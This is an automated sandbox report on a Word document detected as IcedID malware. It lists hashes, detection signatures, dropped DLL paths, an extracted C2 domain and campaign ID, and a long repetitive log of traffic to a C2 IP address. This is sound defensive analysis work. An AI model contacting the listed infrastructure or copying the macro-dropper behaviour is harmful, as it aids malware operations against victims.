Windows Analysis Report
dodsonimaging,file,08.11.2022.doc

Overview

General Information

Sample Name: dodsonimaging,file,08.11.2022.doc
Analysis ID: 682555
MD5: db11828aed458eccfab30c367bc1bb2f
SHA1: 3487931f130485c82d21e9ef4155af0a8fd46c33
SHA256: d297f78ca4fc35e899792260c98f752947f7d6b5999650a6210f4a8538a2e655
Tags: docIcedID
Infos:

Detection

IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Yara detected IcedID
Submitted sample is a known malware sample
Office process drops PE file
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Yara signature match
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: dodsonimaging,file,08.11.2022.doc Virustotal: Detection: 26% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll Avira: detection malicious, Label: HEUR/AGEN.1251556
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll Avira: detection malicious, Label: HEUR/AGEN.1251556
Yara detected IcedID
Source: Yara match File source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
Source: Yara match File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: dodsonimaging,file,08.11.2022.doc Joe Sandbox ML: detected
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: IcedID {"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D2CCA CryptCreateHash, 5_2_000007FEF74D2CCA
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D2CDA CryptCreateHash, 5_2_000007FEF74D2CDA
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D2CF7 CryptCreateHash,CryptAcquireContextW, 5_2_000007FEF74D2CF7
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D2CCA CryptCreateHash, 5_2_000007FEF74D2CCA
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: rundll32.pdb source: r8F8A.tmp.exe, r8F8A.tmp.exe, 00000004.00000000.924645726.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe, 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe.0.dr

Software Vulnerabilities
barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.dr Jump to dropped file
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: alexbionka.com
Source: global traffic DNS query: name: alexbionka.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
